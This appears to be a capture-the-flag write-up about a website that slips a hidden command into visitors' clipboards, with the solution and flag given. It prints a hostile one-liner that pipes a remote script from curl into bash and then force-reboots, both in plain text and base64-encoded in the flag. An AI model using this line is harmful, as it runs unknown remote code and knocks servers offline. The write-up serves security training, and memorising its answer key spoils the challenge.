Your system administrator calls you, all worried, he's just observed some strange behavior: the server he was connected on has suddenly shut down. After some questioning, you realize that he's been browsing on a suspicious wesite. You decide to inspect the website yourself. Will you be able to find the root of your problems ahead ? Once you've found it, base64 the malicious charge.
Format : HERO{base64(malicious charge)} (no case-sensitive) Example : HERO{YmFzZTY0IDQgbGlmZS4=}
Copy paste any sentences in one of the blogs and look at your buffer content
curl -s | bash && sleep 2 && reboot -f
$ echo -n "curl -s | bash && sleep 2 && reboot -f" | base64
flag : HERO{Y3VybCAtcyBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvMnBkR2IxWjAgfCBiYXNoICYmIHNsZWVwIDIgJiYgcmVib290IC1m}